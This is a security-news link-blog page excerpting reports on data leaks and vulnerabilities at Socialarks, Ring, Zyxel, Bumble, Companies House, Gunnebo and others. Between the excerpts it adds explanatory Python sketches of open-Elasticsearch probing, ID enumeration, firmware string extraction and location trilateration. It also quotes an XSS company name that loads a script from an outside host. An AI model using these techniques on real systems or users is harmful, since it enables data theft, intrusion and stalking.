The Linkielist

Linking ideas with the world

Socialarks leaks 400GB of scraped data exposing 200+ million Facebook, Instagram and LinkedIn users. Again.

High-flying and rapidly growing Chinese social media management company Socialarks has suffered a huge data leak, exposing over 400GB of personal data, including that of several high-profile celebrities and social media influencers.

The company’s unsecured ElasticSearch database contained personally identifiable information (PII) from at least 214 million social media users around the world, drawn from popular consumer platforms such as Facebook and Instagram as well as professional networks such as LinkedIn.

The Elastic instance was discovered as part of Safety Detectives’ cybersecurity mission of finding online vulnerabilities that could potentially pose risks to the general public. Once the owner of the data is identified, our team informs the affected parties as soon as possible to mitigate the risk of cybersecurity breaches and server leaks.

In Socialarks’ case, our team found the ElasticSearch server to be publicly exposed without password protection or encryption, during routine IP-address checks on potentially unsecured databases.

The lack of security apparatus on the company’s server meant that anyone in possession of the server IP-address could have accessed a database containing millions of people’s private information.
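
To illustrate just how low the bar is: an Elasticsearch server with no security layer answers plain HTTP on port 9200, so listing indices and pulling documents takes nothing more than a couple of GET requests. A minimal Python sketch — the IP below is a TEST-NET placeholder and the sample response is fabricated to match the story, but the `_cat/indices` endpoint shape is the real one:

```python
import json

# Hypothetical exposed instance -- 203.0.113.10 is a TEST-NET-3
# placeholder address, not a real server.
BASE = "http://203.0.113.10:9200"

def index_summary(cat_indices_json: str):
    """Parse the body of GET /_cat/indices?format=json into
    (index name, document count) pairs -- the first thing anyone
    probing an open cluster sees."""
    rows = json.loads(cat_indices_json)
    return [(r["index"], int(r["docs.count"])) for r in rows]

def search_url(index: str, size: int = 10) -> str:
    """URL that returns `size` raw documents from an index; with no
    security layer enabled, no credentials are needed (fetching it
    would be e.g. urllib.request.urlopen(search_url("instagram")))."""
    return f"{BASE}/{index}/_search?size={size}"

# Fabricated response shaped like Elasticsearch's _cat/indices output:
sample = '[{"index": "instagram", "docs.count": "11651162"}]'
print(index_summary(sample))   # [('instagram', 11651162)]
print(search_url("instagram"))
```

Routine scanners find open instances within hours precisely because this takes two requests and zero skill.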

According to Anurag Sen, head of the Safety Detectives cybersecurity team, the affected database contained a “huge trove” of sensitive personal information to the tune of 408GB and more than 318 million records in total.

Given the sheer size of the data leak, it has been severely challenging for our team to unravel the full extent of the potential damage caused.

Our research team was able to determine that the entirety of the leaked data was “scraped” from social media platforms, which is both unethical and a violation of Facebook’s, Instagram’s and LinkedIn’s terms of service.

Moreover, it is important to note that Socialarks suffered a similar data breach in August 2020 leading to data from 150 million LinkedIn, Facebook and Instagram users being exposed.

Almost as a carbon-copy, August’s database breach revealed reams of personal data from 66 million LinkedIn users, 11.6 million Instagram accounts and 81.5 million Facebook accounts.

From the leaked data we discovered, it was possible to determine people’s full names, country of residence, place of work, position, subscriber data and contact information, as well as direct links to their profiles.

[…]

The database contained more than 408GB of data and more than 318 million records.

What was leaked?

Without any protection whatsoever, our research team discovered the following:

  • 11,651,162 Instagram user profiles
  • 66,117,839 LinkedIn user profiles
  • 81,551,567 Facebook user profiles
  • a further 55,300,000 Facebook profiles which were summarily deleted within a few hours after our team first discovered the server and its vulnerability.

Surprisingly, the numbers of profiles affected in the data leak found by our team are the same as the numbers mentioned in the August data leak. However, there were big differences, such as the size of the database, the companies hosting the servers and the number of indices.

The affected server, hosted by Tencent, was segmented into indices in order to store data obtained from each social media source. Our team discovered records from 3 major social media platforms: Instagram, Facebook and LinkedIn.

Instagram data

The Instagram index contained various popular personalities and online celebrities.

Our team discovered several high-profile influencers in the exposed database, including prominent food bloggers, celebrities and other social media influencers.

Celebrity Instagram profile including phone number and email address.

Every record contained public data scraped from influencer Instagram accounts, including their biographies, profile pictures, follower totals, location settings as well as personal information such as contact details in the form of email addresses and phone numbers.

The Instagram records exposed the following details:

  • Full name
  • Phone numbers for 6+ million users
  • Email addresses for all 11+ million users
  • Profile link
  • Username
  • Profile picture
  • Profile description
  • Average comment count
  • Number of followers and following count
  • Country of location
  • Specific locality in some cases
  • Frequently used hashtags

Facebook data

As mentioned above, the leak exposed 81.5 million Facebook user profiles with over 40 million exposed phone numbers and a further 32 million email address entries. Notably, most of the phone numbers our team discovered originated from pages and not individuals.

The Facebook records exposed the following details:

  • Full name
  • ‘About’ text
  • Email addresses
  • Phone numbers
  • Country of location
  • Like, Follow and Rating count
  • Messenger ID
  • Facebook link with profile pictures
  • Website link
  • Profile description

LinkedIn data

Finally, our team discovered 66.1 million LinkedIn user profiles with as many as 31 million leaked email addresses (not disclosed in the profile but obtained through other, as yet unknown, sources).

The LinkedIn records exposed the following details:

  • Full name
  • Email addresses
  • Job profile including job title and seniority level
  • LinkedIn profile link
  • User tags
  • Domain name
  • Connected social media account login names e.g., Twitter
  • Company name and revenue margin

Database search showing 66 million LinkedIn profile results including personal information such as job title, name and email address.

The chart below shows a breakdown of user profiles, sorted by country, drawn from a sample of 42 million records.

Unexplained presence of Instagram and LinkedIn personal data

Socialarks’ database contained scraped data including personal information, although many of the user records were only partially complete.

However, according to our findings, Socialarks’ database stored personal data for Instagram and LinkedIn users such as private phone numbers and email addresses for users that did not divulge such information publicly on their accounts. How Socialarks could possibly have access to such data in the first place remains unknown.

Also, the fact that such a large, active, and data-rich database was left completely unsecured (probably for a second time) is astonishing.

It remains unclear how the company managed to obtain private data from multiple secure sources.

Instagram profile showing email address and phone number despite this information not being provided to Instagram.

It is also worth noting that Socialarks is based in China and was founded with private venture capital in 2014, while the vulnerable server is located in Hong Kong.

Source: Chinese start-up leaked 400GB of scraped data exposing 200+ million Facebook, Instagram and LinkedIn users

Amazon Ring Neighbors App Left User Data Exposed, incl addresses, lat + long

Ring, the Amazon-owned friend to nosy police departments everywhere, has suffered another embarrassing security stumble. The surveillance company’s Neighbors app—which was launched in 2018 as a kind of “neighborhood watch” feature—apparently left users’ exact geographical data and home address information exposed to the internet.

Neighbors is Ring’s online forum where users can share public safety information about what’s going on in their communities. It’s basically a more dystopian version of Nextdoor. Posts on Neighbors are public but supposedly anonymous, with a poster’s full name and location obscured. Yet, due to the recently discovered security bug, a savvy web explorer would’ve been able to access information about the home addresses, as well as the exact latitude and longitude, of a poster’s location, TechCrunch reports.

Similarly, every time a user posted on Neighbors, Ring servers generated a unique number for the post. These numbers increased incrementally with each post, making it easy to tie the identifying number to other information about the poster, including geographical data, according to TechCrunch. All of this was invisible to the app user, however.
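
Sequential identifiers like this are a classic enumeration bug: once you know any recent post’s number, you can simply count downwards and harvest everything. A toy sketch of the pattern — the store and field names are invented, since the real Neighbors API is undocumented:

```python
# Minimal sketch of why sequential post IDs are enumerable.
# `fetch_post` stands in for a hypothetical API endpoint; the real bug
# returned location metadata alongside each post.
POSTS = {  # simulated server-side store, keyed by auto-incremented ID
    1001: {"text": "Car break-in", "lat": 41.88, "lon": -87.63},
    1002: {"text": "Lost dog",     "lat": 41.89, "lon": -87.64},
    1003: {"text": "Porch pirate", "lat": 41.90, "lon": -87.65},
}

def fetch_post(post_id):
    return POSTS.get(post_id)  # no authorization check, like the real bug

def scrape_all(newest_id, limit=100):
    """Walk IDs downward from the newest one, collecting every hit."""
    found = []
    for pid in range(newest_id, newest_id - limit, -1):
        post = fetch_post(pid)
        if post:
            found.append((pid, post["lat"], post["lon"]))
    return found

print(scrape_all(1003))  # every post plus its exact coordinates
```

Random, non-guessable post identifiers (or an actual authorization check per record) would have closed this off.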

Source: Amazon Ring Neighbors App Left User Data Exposed

I still don’t understand the use case for Ring. “I’m not here, leave the package” – right, I’ll just break in now then!

Zyxel products have a hardcoded root user you can access from internet

TL;DR: If you have a Zyxel USG, ATP, VPN, ZyWALL or USG FLEX you should update to the latest firmware version today. You can find the full list of affected devices here and the Zyxel advisory here.

Zyxel is a popular brand of firewalls marketed towards small and medium businesses. Their Unified Security Gateway (USG) product line is often used as a firewall or VPN gateway. With so many of us working from home, VPN-capable devices have been selling quite well lately.

When doing some research (rooting) on my Zyxel USG40, I was surprised to find a user account ‘zyfwp’ with a password hash in the latest firmware version (4.60 patch 0). The plaintext password was visible in one of the binaries on the system. I was even more surprised that this account seemed to work on both the SSH and web interface.

$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
  Name: zyfwp
  Type: admin
(...)
Router>

The user is not visible in the interface and its password cannot be changed. I checked the previous firmware version (4.39) and although the user was present, it did not have a password. It seemed the vulnerability had been introduced in the latest firmware version. Even though older versions do not have this vulnerability, they do have others (such as this buffer overflow) so you should still update.
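
Finding a secret like this is usually no more sophisticated than running `strings` over the firmware and reading the output. A rough Python equivalent, run against a fabricated firmware fragment — the password shown is a made-up placeholder, not the real (redacted) one:

```python
import re

def strings(blob: bytes, min_len: int = 4):
    """Rough equivalent of the Unix `strings` tool: extract runs of
    printable ASCII of at least `min_len` characters."""
    return [m.group().decode() for m in
            re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]

# Simulated firmware fragment: the undocumented account name next to a
# fake placeholder password, surrounded by binary noise.
firmware = b"\x00\x01zyfwp\x00PrOv1dPwd\x00\xff\xfeconfig\x00"

print(strings(firmware))  # ['zyfwp', 'PrOv1dPwd', 'config']
```

Plaintext credentials in a shipped binary survive exactly this kind of trivial inspection, which is why hashes (and per-device secrets) exist.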

As SSL VPN on these devices operates on the same port as the web interface, a lot of users have exposed port 443 of these devices to the internet. Using publicly available data from Project Sonar, I was able to identify about 3,000 Zyxel USG/ATP/VPN devices in the Netherlands. Globally, more than 100,000 devices have exposed their web interface to the internet.

Source: Undocumented user account in Zyxel products (CVE-2020-29583) – EYE

Spotify resets passwords after a security bug exposed users’ private account information – for 6 months

Spotify said it has reset an undisclosed number of user passwords after blaming a software vulnerability in its systems for exposing private account information to its business partners.

In a data breach notification filed with the California attorney general’s office, the music streaming giant said the data exposed “may have included email address, your preferred display name, password, gender, and date of birth only to certain business partners of Spotify.” The company did not name the business partners, but added that Spotify “did not make this information publicly accessible.”

Spotify said the vulnerability existed as far back as April 9 but wasn’t discovered until November 12. But like most data breach notices, Spotify did not say what the vulnerability was or how user account data became exposed.

“We have conducted an internal investigation and have contacted all of our business partners that may have had access to your account information to ensure that any personal information that may have been inadvertently disclosed to them has been deleted,” the letter read.

Spotify spokesperson Adam Grossberg confirmed that a “small subset” of Spotify users are affected, but did not provide a specific figure. Spotify has more than 320 million users, and 144 million subscribers.

It’s the second time in as many months that the company has reset user passwords.

Last month security researchers found an unsecured database, likely operated by hackers, allegedly containing around 300,000 stolen user passwords. The database was probably used to launch credential stuffing attacks, in which lists of stolen passwords are matched against different websites that use the same password.

Although in that case the exposed data did not come from Spotify, the company reset the passwords on affected user accounts.
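
A sensible defence against credential stuffing is checking users’ passwords against known breach corpora without the password ever leaving the client, which is what the k-anonymity scheme used by services like Have I Been Pwned’s Pwned Passwords API does: only the first five hex characters of the SHA-1 hash are sent, and the suffix is matched locally. A sketch — the response body here is fabricated:

```python
import hashlib

def split_hash(password: str):
    """SHA-1 the password; return the 5-hex-char prefix (sent to the
    range API) and the 35-char suffix (matched locally)."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[:5], digest[5:]

def is_pwned(password: str, range_response: str) -> bool:
    """`range_response` mimics the newline-separated 'SUFFIX:COUNT'
    body the range endpoint returns for a given 5-char prefix."""
    _, suffix = split_hash(password)
    return any(line.split(":")[0] == suffix
               for line in range_response.splitlines())

# Fabricated response body containing the suffix for 'password01':
prefix, suffix = split_hash("password01")
fake_response = f"{suffix}:12345\n0123456789ABCDEF0123456789ABCDEF012:2"
print(prefix, is_pwned("password01", fake_response))  # prints the prefix and True
```

The server never sees the password or even its full hash, so the lookup itself leaks almost nothing.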

Source: Spotify resets passwords after a security bug exposed users’ private account information | TechCrunch

Data of 243 million Brazilians exposed online via govt website source code

The personal information of more than 243 million Brazilians, both living and deceased, has been exposed online after web developers left the password for a crucial government database inside the source code of an official Brazilian Ministry of Health website for at least six months.

The security snafu was discovered by reporters from Brazilian newspaper Estadao, the same newspaper that last week discovered that a São Paulo hospital leaked personal and health information for more than 16 million Brazilian COVID-19 patients after an employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub.

Estadao reporters said they were inspired by a report filed in June by Brazilian NGO Open Knowledge Brasil (OKBR), which, at the time, reported that a similar government website also left exposed login information for another government database in the site’s source code.

Since a website’s source code can be accessed and reviewed by anyone pressing F12 inside their browser, Estadao reporters searched for similar issues in other government sites.

They found a similar leak in the source code of e-SUS-Notifica, a web portal where Brazilian citizens can sign up and receive official government notifications about the COVID-19 pandemic.
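
Hard-coded credentials in client-side source are easy to find precisely because they follow predictable patterns. A crude illustrative scanner — the regexes and the sample page are invented, not the actual e-SUS-Notifica code:

```python
import re

# Heuristic patterns that commonly betray hard-coded secrets in
# client-side source. Illustrative only, not an exhaustive scanner.
SECRET_PATTERNS = [
    re.compile(r'(password|passwd|pwd)\s*[:=]\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'(api[_-]?key|secret)\s*[:=]\s*["\']([^"\']+)["\']', re.I),
]

def find_secrets(page_source: str):
    """Return (label, value) pairs for anything that looks like a
    credential embedded in the page."""
    hits = []
    for pat in SECRET_PATTERNS:
        hits += [(m.group(1), m.group(2)) for m in pat.finditer(page_source)]
    return hits

# Hypothetical page source resembling the mistake Estadao describes:
html = '<script>const db = {user: "esus", password: "hunter2"};</script>'
print(find_secrets(html))  # [('password', 'hunter2')]
```

Anything shipped to the browser is public; secrets belong server-side, behind an authenticated API.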

[…]

Source: Data of 243 million Brazilians exposed online via website source code | ZDNet

Bumble Left Daters’ Location Data Up For Grabs For Over Six Months

Bumble, the dating app behemoth that’s allegedly headed to a major IPO as soon as next year, apparently took over half a year to deal with major security flaws that left sensitive information belonging to its millions of users vulnerable.

That’s according to new research posted over the weekend by cybersecurity firm Independent Security Evaluators (ISE) detailing how a bad actor—even one that was banned from Bumble—could exploit a vulnerability in the app’s underlying code to pull the rough location data for any Bumbler within their city, as well as additional profile data like photos and religious views. Despite being informed about this vulnerability in mid-March, the company didn’t patch the issues until November 12—roughly six and a half months later.

Pre-patch, anyone with a Bumble account could query the app’s API in order to figure out roughly how many miles away any other user in their city happened to be. As the blog’s author, Sanjana Sarda, explained, if a certain creepy someone really wanted to figure out the location of a given Bumble user, it wouldn’t be too hard to set up a handful of accounts, figure out the user’s basic distance from each one, and use that collection of data to triangulate a Bumbler’s precise location.
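
The technique Sarda describes is plain trilateration on a plane: three known probe positions plus three distance readings pin the target to a single point. A sketch with synthetic coordinates, assuming (as the research found) the API returned distances precise enough to be useful:

```python
import math

def trilaterate(p1, r1, p2, r2, p3, r3):
    """Solve for (x, y) given three known points and their distances to
    the target, on a flat plane (a fair local approximation within a
    city). Standard linearization: subtract circle equations pairwise."""
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    a = 2 * (x2 - x1); b = 2 * (y2 - y1)
    c = r1**2 - r2**2 - x1**2 + x2**2 - y1**2 + y2**2
    d = 2 * (x3 - x2); e = 2 * (y3 - y2)
    f = r2**2 - r3**2 - x2**2 + x3**2 - y2**2 + y3**2
    x = (c * e - f * b) / (e * a - b * d)
    y = (c * d - a * f) / (b * d - a * e)
    return x, y

# Three fake accounts at known spots, each reading the API's distance
# to the same victim:
target = (3.0, 4.0)
probes = [(0.0, 0.0), (10.0, 0.0), (0.0, 10.0)]
dists = [math.dist(p, target) for p in probes]
x, y = trilaterate(probes[0], dists[0], probes[1], dists[1],
                   probes[2], dists[2])
print(round(x, 6), round(y, 6))  # 3.0 4.0
```

This is why distance-revealing APIs usually add rounding or jitter; exact distances from a handful of throwaway accounts are as good as a GPS fix.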

Bumble isn’t the first company to accidentally leave this sort of data freely available. Last year, cybersecurity sleuths were able to glean the precise locations of people using LGBT-centric dating apps like Grindr and Romeo and collate them into a user location map. And those location-data leaks are on top of the deliberate data sharing these sorts of dating apps typically already engage in with a bevy of third-party partners. You would think that an app purporting to be a feminist haven like Bumble might extend its idea of user safety to its data practices.

While some of the issues described by Sarda have been resolved, the belated patch apparently didn’t tackle one of the other major API-based issues described in the blog, which allowed ISE to get unlimited swipes (or “votes” in Bumble parlance), along with access to other premium features like the ability to unswipe or to see who might have swiped right on them. Typically, accessing these features costs a given Bumbler roughly $10 per week.

Source: Bumble Left Daters’ Location Data Up For Grabs For Over Six Months

Microsoft: Russian, North Korean Hackers Attacked Covid-19 Labs

Microsoft researchers have found evidence that Russian and North Korean hackers have systematically attacked covid-19 labs and vaccine makers in an effort to steal data and initiate ransomware attacks.

“Among the targets, the majority are vaccine makers that have Covid-19 vaccines in various stages of clinical trials, clinical research organization involved in trials, and one has developed a Covid-19 test,” said Tom Burt, a VP in Customer Security at Microsoft. “Multiple organizations targeted have contracts with or investments from government agencies from various democratic countries for Covid-19 related work.”

“The targets include leading pharmaceutical companies and vaccine researchers in Canada, France, India, South Korea, and the United States. The attacks came from Strontium, an actor originating from Russia, and two actors originating from North Korea that we call Zinc and Cerium,” wrote Burt.

The attacks seem to be brute force login attempts and spear-phishing meant to lure victims to give up their security credentials. Microsoft, obviously, reports that its tools were able to catch and prevent most of the attacks. Sadly, the hackers are pretending to be World Health Organization reps in order to trick doctors into installing malware.

Zack Whittaker at TechCrunch noted that the Russian group, Strontium, is better known as APT28 or Fancy Bear, and the other groups are probably part of the North Korean Lazarus Group, the hackers responsible for the WannaCry ransomware and the 2014 Sony Pictures hack.

Source: Microsoft: Russian, North Korean Hackers Attacked Covid-19 Labs

Microsoft warns against SMS, voice calls for multi-factor authentication: Try something that can’t be SIM swapped

In a blog post, Alex Weinert, director of identity security at Microsoft, says people should definitely use MFA. He claims that accounts using any type of MFA get compromised at a rate that’s less than 0.1 per cent of the general population.

At the same time, he argues people should avoid relying on SMS messages or voice calls to handle one-time passcodes (OTPs) because phone-based protocols are fundamentally insecure.

“These mechanisms are based on public switched telephone networks (PSTN), and I believe they’re the least secure of the MFA methods available today,” said Weinert. “That gap will only widen as MFA adoption increases attackers’ interest in breaking these methods and purpose-built authenticators extend their security and usability advantages.”

Hacking techniques like SIM swapping – where a miscreant calls a mobile carrier posing as a customer to request the customer’s number be ported to a different SIM card in the attacker’s possession – and more sophisticated network attacks like SS7 interception have demonstrated the security shortcomings of public phone networks and the companies running them.

Computer scientists from Princeton University examined SIM swapping in a research study [PDF] earlier this year and their results support Weinert’s claims. They tested AT&T, T-Mobile, Tracfone, US Mobile, and Verizon Wireless and found “all 5 carriers used insecure authentication challenges that could easily be subverted by attackers.”

They also looked at 140 online services that used phone-based authentication to see whether they resisted SIM swapping attacks. And they found 17 had authentication policies that allowed an attacker to hijack an account with a SIM swap.

In September, security firm Check Point Research published a report describing various espionage campaigns, including the discovery of malware that sets up an Android backdoor to steal two-factor authentication codes from SMS messages.

Weinert argues that SMS and voice protocols were not designed with encryption, are easy to attack using social engineering, rely on unreliable mobile carriers, and are subject to shifting regulation.
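
The “purpose-built authenticators” Weinert prefers mostly implement TOTP (RFC 6238): the code is derived from a shared secret and the current time, so nothing crosses the phone network and there is nothing to SIM-swap. The whole algorithm fits in a few lines of stdlib Python:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, for_time=None, step: int = 30) -> str:
    """RFC 6238: HOTP with the counter derived from wall-clock time."""
    t = time.time() if for_time is None else for_time
    return hotp(secret, int(t // step))

# RFC 6238 test secret; at t=59s the time-step counter is 1.
secret = b"12345678901234567890"
print(totp(secret, for_time=59))  # '287082' (matches the RFC test vector)
```

An SMS OTP, by contrast, travels the same PSTN path the Princeton study showed carriers routinely fail to protect.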

[…]

Source: Microsoft warns against SMS, voice calls for multi-factor authentication: Try something that can’t be SIM swapped • The Register

Swiss spies knew about Crypto AG compromise – and kept it from govt overseers for nearly 30 years

Swiss politicians only found out last year that cipher machine company Crypto AG was (quite literally) owned by the US and Germany during the Cold War, a striking report from its parliament has revealed.

The company, which supplied high-grade encryption machines to governments and corporations around the world, was in fact owned by the US civilian foreign intelligence service the CIA and Germany’s BND spy agency during the Cold War, as we reported earlier this year.

Although Swiss spies themselves knew that Crypto AG’s products were being intentionally weakened so the West could read messages passing over them, they didn’t tell governmental overseers until last year – barely one year after the operation ended.

So stated the Swiss federal parliament in a report published yesterday afternoon, which has raised fresh eyebrows over the scandal. While infosec greybeard Bruce Schneier told El Reg last year: “I thought we knew this for decades,” referring to age-old (but accurate, though officially denied) news reports of the compromise, this year’s revelations have been the first official admissions that not only was this going on, but that it was deliberately hidden from overseers.

[…]

The revelations that the Swiss state itself knew about Crypto AG’s operations may prove to be a diplomatic embarrassment; aside from secrecy and chocolate, Switzerland’s other big selling point on the international stage is that it is very publicly and deliberately neutral. Secretly cooperating with Western spies during the Cold War and beyond, and enabling spying on state-level customers, is likely to harm that reputation.

Professor Woodward concluded: “If nothing else this whole episode shows that it’s easier to interfere with equipment handling encryption than to try to tackle the encryption head on. But, it has a warning for those who would seek to give a golden key, weaken encryption or provide some other means for government agencies to read encrypted messages. Just like you can’t be a little bit pregnant, if the crypto is weakened then you have to assume your communications are no longer secure.”

Source: Swiss spies knew about Crypto AG compromise – and kept it from govt overseers for nearly 30 years • The Register

EU Takes Another Small Step Towards Trying To Ban Encryption; New Paper Argues Tech Can Backdoor Encryption Safely. It can’t.

In September, we noted that officials in the EU were continuing an effort to try to ban end-to-end encryption. Of course, that’s not how they put it. They say they just want “lawful access” to encrypted content, not recognizing that any such backdoor effectively obliterates the protections of end-to-end encryption. A new “Draft Council Resolution on Encryption” has come out as the EU Council of Ministers continues to drift dangerously towards this ridiculous position.

We’ve seen documents like this before. It starts out with a preamble insisting that they’re not really trying to undermine encryption, even though they absolutely are.

The European Union fully supports the development, implementation and use of strong encryption. Encryption is a necessary means of protecting fundamental rights and the digital security of governments, industry and society. At the same time, the European Union needs to ensure the ability of competent authorities in the area of security and criminal justice, e.g. law enforcement and judicial authorities, to exercise their lawful powers, both online and offline.

Uh huh. That’s basically: we fully support you having privacy in your own home, except when we need to spy on you at a moment’s notice. It’s not so comforting when put that way, but it’s what they’re saying.

[…]

This is the same old garbage we’ve seen before. Technologically illiterate bureaucrats who have no clue at all, insisting that if they just “work together” with the tech industry, some magic golden key will be found. This is not how any of this works. Introducing a backdoor into encryption is introducing a massive, dangerous vulnerability.

[…]

Attacking end-to-end encryption in order to deal with the miniscule number of situations where law enforcement is stymied by encryption would, in actuality, put everyone at massive risk of having their data accessed by malicious parties.

[…]

Source: EU Takes Another Small Step Towards Trying To Ban Encryption; New Paper Argues Tech Can Nerd Harder To Backdoor Encryption | Techdirt

Introducing a backdoor is introducing a vulnerability, one that anyone can exploit: the good guys, the bad guys and the idiots. There is a long and varied history of exploited backdoors in all kinds of very important stuff (e.g. the Clipper chip, the encryption hardware sold to governments, mobile phone networks, even kids’ smartwatches and switches), and they’ve all been misused by malicious actors.

Here is a long but not exhaustive list.

Hotels.com, Booking.com and Expedia provider exposed data from 2013 for millions of guests in an open AWS bucket

Website Planet reports that Prestige Software, the company behind hotel reservation platforms for Hotels.com, Booking.com and Expedia, left data exposed for “millions” of guests on an Amazon Web Services S3 bucket. The 10 million-plus log files dated as far back as 2013 and included names, credit card details, ID numbers and reservation details.

It’s not certain how long the data was left open, or if anyone took the data. Website Planet said the hole was closed a day after telling AWS about the exposure. Prestige confirmed that it owned the data.

The damage could be severe if crooks found the data. WP warned that it could lead to all too common risks with hotel data exposures like credit card fraud, identity theft and phishing scams. Perpetrators could even hijack a reservation to steal someone else’s vacation.

Source: Hotels.com, Expedia provider exposed data for millions of guests | Engadget

UK Companies House Demands Company Stop Using Name Which Includes an HTML Closing Tag

A British software engineer came up with “a fun playful name” for his consulting business. He’d named it:

“”><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD

Unfortunately, this did not amuse the official registrar of companies in the United Kingdom (known as Companies House). The Guardian reports that the U.K. agency “has forced the company to change its name after it belatedly realised it could pose a security risk.” Henceforward, the software engineer’s consulting business will instead be legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.” He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.

Engadget adds: Companies House, meanwhile, said it had “put measures in place” to prevent a repeat. You won’t be trying this yourself, at least not in the U.K.

It’s more than a little amusing to see a for-the-laughs code name stir up trouble, but this also illustrates just how fragile web security can be.
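
The underlying lesson is output encoding: data rendered into HTML must be escaped at the point of output, after which a hostile company name is just an odd-looking string. A minimal sketch — the name and URL below are illustrative stand-ins, not the registered name:

```python
import html

# A registry that renders names into pages without encoding them will
# execute any markup the name contains. Output encoding makes the same
# name inert.
company = '"><SCRIPT SRC=HTTPS://EXAMPLE.COM/X.JS> LTD'  # illustrative

unsafe = f"<td>{company}</td>"             # how the bug happens
safe = f"<td>{html.escape(company)}</td>"  # how it's prevented

print(unsafe)
print(safe)
```

`html.escape` turns `<`, `>`, `&` and quotes into entities, so the browser displays the name instead of running it; template engines that auto-escape do the same thing by default.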

Source: UK Agency Demands Company Stop Using Name Which Includes an HTML Closing Tag – Slashdot

Android Versions Below 7.1.1 Won’t Support Many Secure Certificates in 2021

One of the world’s top certificate authorities warns that phones running versions of Android prior to 7.1.1 Nougat will be cut off from large portions of the secure web starting in 2021, Android Police reported Saturday.

The Mozilla-partnered nonprofit Let’s Encrypt said that its partnership with fellow certificate authority IdenTrust will expire on Sept. 1, 2021. Since it has no plans to renew its cross-signing agreement, Let’s Encrypt plans to stop default cross-signing for IdenTrust’s root certificate, DST Root X3, beginning on Jan. 11 as the organization switches over to solely using its own ISRG Root X1 root.

It’s a pretty significant shift considering that as much as one-third of all web domains rely on the organization’s certificates. But since older software won’t trust Let’s Encrypt’s root certificate, this could “introduce some compatibility woes,” lead developer Jacob Hoffman-Andrews said in a blog post Friday.

“Some software that hasn’t been updated since 2016 (approximately when our root was accepted to many root programs) still doesn’t trust our root certificate, ISRG Root X1,” he said. “Most notably, this includes versions of Android prior to 7.1.1. That means those older versions of Android will no longer trust certificates issued by Let’s Encrypt.”

The only workaround for these users would be to install Firefox since it relies on its own certificate store that includes Let’s Encrypt’s root, though that wouldn’t keep applications from breaking or ensure functionality beyond your browser.
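
The mechanics are easiest to see in a toy model of chain building: a client trusts a certificate only if its chain terminates at a root in the local store, and cross-signing simply gives the same intermediate a second chain to an older root. A simplified sketch (real validation also checks signatures, validity dates and extensions; the chain labels are illustrative):

```python
# Toy model: a client trusts a chain iff the root it terminates at is
# present in the device's trust store.
def chain_trusted(chain, trust_store):
    return chain[-1] in trust_store

old_android = {"DST Root X3"}                  # pre-7.1.1 store, simplified
new_android = {"DST Root X3", "ISRG Root X1"}  # updated store

# The same Let's Encrypt intermediate can be served with two chains:
cross_signed = ["example.com", "Let's Encrypt R3", "DST Root X3"]
own_root     = ["example.com", "Let's Encrypt R3", "ISRG Root X1"]

print(chain_trusted(cross_signed, old_android))  # True: works while cross-signing lasts
print(chain_trusted(own_root, old_android))      # False: what breaks in 2021
print(chain_trusted(own_root, new_android))      # True: updated devices are fine
```

Firefox sidesteps the problem because it ships its own trust store containing ISRG Root X1, regardless of what the Android version below it trusts.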

Let’s Encrypt noted that roughly 34% of Android devices are running a version older than 7.1, based on data from Google’s Android development suite. That translates to millions of users potentially being cut off from large portions of the secure web beginning in 2021.

Source: Older Android Phones Won’t Support Many Secure Websites in 2021

Physical Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo

In March 2020, KrebsOnSecurity alerted Swedish security giant Gunnebo Group that hackers had broken into its network and sold the access to a criminal group which specializes in deploying ransomware. In August, Gunnebo said it had successfully thwarted a ransomware attack, but this week it emerged that the intruders stole and published online tens of thousands of sensitive documents — including schematics of client bank vaults and surveillance systems.

The Gunnebo Group is a Swedish multinational company that provides physical security to a variety of customers globally, including banks, government agencies, airports, casinos, jewelry stores, tax agencies and even nuclear power plants. The company has operations in 25 countries, more than 4,000 employees, and billions in revenue annually.

Acting on a tip from Milwaukee, Wis.-based cyber intelligence firm Hold Security, KrebsOnSecurity in March told Gunnebo about a financial transaction between a malicious hacker and a cybercriminal group which specializes in deploying ransomware. That transaction included credentials to a Remote Desktop Protocol (RDP) account apparently set up by a Gunnebo Group employee who wished to access the company’s internal network remotely.

[…]

Larsson quotes Gunnebo CEO Stefan Syrén saying the company never considered paying the ransom the attackers demanded in exchange for not publishing its internal documents. What’s more, Syrén seemed to downplay the severity of the exposure.

“I understand that you can see drawings as sensitive, but we do not consider them as sensitive automatically,” the CEO reportedly said. “When it comes to cameras in a public environment, for example, half the point is that they should be visible, therefore a drawing with camera placements in itself is not very sensitive.”

It remains unclear whether the stolen RDP credentials were a factor in this incident. But the password to the Gunnebo RDP account — “password01” — suggests the security of its IT systems may have been lacking in other areas as well.

[…]

Source: Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo — Krebs on Security

In a first, researchers extract secret key used to encrypt Intel CPU code

Researchers have extracted the secret key that encrypts updates to an assortment of Intel CPUs, a feat that could have wide-ranging consequences for the way the chips are used and, possibly, the way they’re secured.

The key makes it possible to decrypt the microcode updates Intel provides to fix security vulnerabilities and other types of bugs. Having a decrypted copy of an update may allow hackers to reverse engineer it and learn precisely how to exploit the hole it’s patching. The key may also allow parties other than Intel—say a malicious hacker or a hobbyist—to update chips with their own microcode, although that customized version wouldn’t survive a reboot.

“At the moment, it is quite difficult to assess the security impact,” independent researcher Maxim Goryachy said in a direct message. “But in any case, this is the first time in the history of Intel processors when you can execute your microcode inside and analyze the updates.” Goryachy and two other researchers—Dmitry Sklyarov and Mark Ermolov, both with security firm Positive Technologies—worked jointly on the project.

